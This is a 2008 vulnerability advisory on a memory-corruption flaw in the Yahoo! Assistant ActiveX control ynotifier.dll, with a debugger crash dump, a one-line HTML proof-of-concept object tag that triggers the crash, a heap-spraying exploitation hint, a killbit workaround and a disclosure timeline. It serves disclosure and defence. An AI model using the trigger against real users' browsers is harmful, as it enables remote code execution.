Yahoo! Assistant (3721) ActiveX Remote Code Execution Vulnerability


By Sowhat of Nevis Labs
Date: 2008.05.06

http://www.nevisnetworks.com
http://secway.org/advisory/AD20080506EN.txt
http://secway.org/advisory/AD20080506CN.txt

CVE:    N/A

Vendor
Yahoo! CN

Affected:
Yahoo! Assistant<=3.6


Overview:
Yahoo! Assistant, formerly named 3721 Internet Assistant, is a Browser
Helper Object for Internet Explorer. It was renamed to Yahoo! Assistant
after Beijing 3721 Technology was acquired by Yahoo!.

Yahoo! Assistant includes a lot of useful features, such as IE setting
repair, security shield, removal of internet history information and
blocking ads.
http://cn.zs.yahoo.com/



Details:

The specific flaws exists in the ynotifier.dll ActiveX control.
Succssfully exploiting this vulnerability allows attackers to execute
arbitrary code on vulnerable installation.
Successful exploitation requires that the target user browse to a
malicious web page.

During the instantiation of the Ynoifier COM object through IE, there
will an exploitable memory corruption condition.

(c78.fa0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00e85328 ebx=001ada20 ecx=4080624c edx=00128474 esi=020cb5f0
edi=00000000
eip=43f50743 esp=001283e0 ebp=00128478 iopl=0         nv up ei pl zr na po
nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000
efl=00010246
43f50743 ??               ???

Code:
637a8b47 8b45f8           mov     eax,[ebp-0x8]
637a8b4a 8b08             mov     ecx,[eax]
637a8b4c 8d55fc           lea     edx,[ebp-0x4]
637a8b4f 52               push    edx
637a8b50 6a01             push    0x1
637a8b52 50               push    eax
637a8b53 ff5158           call    dword ptr [ecx+0x58] ;
ds:0023:408062a4=43f50743

The virutal function call at 0x58 is pointed to invalid data.

By taking advantage of some heap spraying technique, the attacker can
exploit
this vulnerability to execute arbitrary code.


Proof of Concept:
The POC for this vulnerability is quite simple, save the following code as
HTML:

<object classid='clsid:2283BB66-A15D-4AC8-BA72-9C8C9F5A1691'>


Workaround:
Set a killbit for this ActiveX.



Vendor Response:

2008.04.23 Vendor notified via email
2008.04.23 Vendor response, developing for patch
2008.04.23 Patch developed, details was held because vendor asked for 1 week
           to (silently ;) push the patch.
2008.05.06 Advisory released


-- 
Sowhat
http://secway.org
"Life is like a bug, Do you know how to exploit it ?"